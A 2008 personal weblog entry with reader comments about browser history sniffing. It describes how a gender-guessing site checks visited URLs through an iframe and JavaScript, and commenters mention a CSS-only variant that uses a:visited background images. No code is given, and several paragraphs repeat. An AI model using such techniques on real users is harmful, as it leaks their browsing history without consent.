Weblog entry #270 for simonw
See all weblog entries made by simonw.
#270
Browser history checking
Posted by simonw on Thu 31 Jul 2008 at 00:56
Everyone is having fun working out the gender of their browsing habits.
http://www.mikeonads.com/2008/07/13/using-your-browser-url-history-estimate-gender/
The geek in me (after allowing it using NoScript) looked at the source, to see how it gathered my browsing history.
It opens an iframe with a list of URLs and checks the state of the URL to see if you have visited it. Immediately leaking information from your browser history to any site you allow to run JavaScript.
I knew that the same origin implementation in common browsers was poor, but I didn't realize how poor. The World Wide Web needs a reimplementation, I would say redesign but many of these issues were anticipated by the designers, it was just the implementors who cut corners.
Further reading;
http://crypto.stanford.edu/sameorigin/sameorigin.pdf
NoScript mentioned again -- oh dear I'm turning paranoid.
http://www.mikeonads.com/2008/07/13/using-your-browser-url-history-estimate-gender/
The geek in me (after allowing it using NoScript) looked at the source, to see how it gathered my browsing history.
It opens an iframe with a list of URLs and checks the state of the URL to see if you have visited it. Immediately leaking information from your browser history to any site you allow to run JavaScript.
I knew that the same origin implementation in common browsers was poor, but I didn't realize how poor. The World Wide Web needs a reimplementation, I would say redesign but many of these issues were anticipated by the designers, it was just the implementors who cut corners.
Further reading;
http://crypto.stanford.edu/sameorigin/sameorigin.pdf
NoScript mentioned again -- oh dear I'm turning paranoid.
Comments on this Entry
Interesting, I got:
Likelihood of you being FEMALE is 4%
Likelihood of you being MALE is 96%
It is good.
Where did you find that in the source though? I could only see the comments.
Likelihood of you being FEMALE is 4%
Likelihood of you being MALE is 96%
It is good.
Where did you find that in the source though? I could only see the comments.
[ Parent | Reply to this comment ]
Unfortunately, NoScript won't save you.
[ Parent | Reply to this comment ]
This seems to work the same way, using JavaScript, or did I miss something?
[ Parent | Reply to this comment ]
"This is an example of how the original CSS history hack found by Jeremiah Grossman can be modified to work without a single line of JavaScript. It uses the fact that properties within display: when combined with a:visited creates conditional logic."
So, this doesn't involve any JavaScript at all, and will still work even if you have NoScript installed.
So, this doesn't involve any JavaScript at all, and will still work even if you have NoScript installed.
[ Parent | Reply to this comment ]
Yes, sorry didn't work for me at work.
They are retrieving tagged images as backgrounds using the CSS.
They are retrieving tagged images as backgrounds using the CSS.
[ Parent | Reply to this comment ]